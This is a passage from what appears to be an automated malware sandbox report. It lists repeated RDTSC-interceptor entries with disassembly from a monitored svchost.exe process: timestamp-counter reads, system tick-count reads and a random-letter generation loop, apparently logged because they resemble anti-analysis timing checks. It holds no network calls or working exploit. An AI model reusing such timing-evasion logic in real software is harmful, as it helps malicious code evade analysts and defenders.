0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59244h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59313h 0x00000031 call 2AA4FB36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59690h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59375h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59350h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59244h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59193h 0x00000033 call 2AA4FF96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59350h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59653h 0x00000031 call 2AA4F7D6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59850h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59313h 0x00000033 call 2AA4F8F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA598F0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59244h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59653h 0x00000031 call 2AA4FD36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA591D0h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59213h 0x00000033 call 2AA4F7D6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59244h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59513h 0x00000031 call 2AA4F9F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59350h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59915h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FB96h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59350h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59175h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FD36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59850h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA597D3h 0x00000033 call 2AA4F9F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA594F0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59804h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59313h 0x00000031 call 2AA4FB36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA598F0h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA594E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA597D3h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59375h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F9F6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59810h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA598F0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA596B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FF96h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59810h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59313h 0x00000031 call 2AA4FEB6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59810h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59875h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FD36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA594F0h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59313h 0x00000033 call 2AA4FEB6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59804h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA594B3h 0x00000031 call 2AA4F9F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59690h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA597D3h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA591D0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA594B3h 0x00000031 call 2AA4FD36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59130h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59804h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA597D3h 0x00000033 call 2AA4FEB6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59530h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
